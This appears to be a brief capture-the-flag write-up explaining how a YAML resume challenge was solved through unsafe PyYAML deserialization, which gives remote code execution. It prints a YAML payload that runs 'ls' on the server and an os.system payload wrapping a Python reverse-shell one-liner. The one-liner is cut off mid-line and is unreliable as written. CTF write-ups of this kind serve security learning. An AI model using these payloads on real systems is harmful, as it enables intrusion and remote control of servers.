Tags: deserialization pyyaml 

Rating: 3.0


Writing your resume on word is for rookies.
Real programmers use yaml.

## Enumeration

< HTTP/1.1 200 OK
< server: gunicorn/20.0.4

gunicorn -> WSGI Python http Server

So we can assume that a yaml parser is implemented in python, and the most commonly used one is Pyyaml

yaml.load() with Loader=UnsafeLoader can lead to RCE

more info:- https://net-square.com/yaml-deserialization-attack-in-python.html


Let us pass our malicious serialized code to a reflecting value.

`!!python/object/apply subprocess.check_output ["ls"]`



We have managed to get a RCE but we are still unable to read the contents of flag

Lets Try for A reverse Shell.

!!python/object/apply:os.system ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST
n/sh","-i"]);' "]

I have created a Auto exploit tool for this challenge, Check my Github

[Github- ZyperX](https://github.com/ZyperX/AppSec-IL-Resume.yml) https://github.com/ZyperX/AppSec-IL-Resume.yml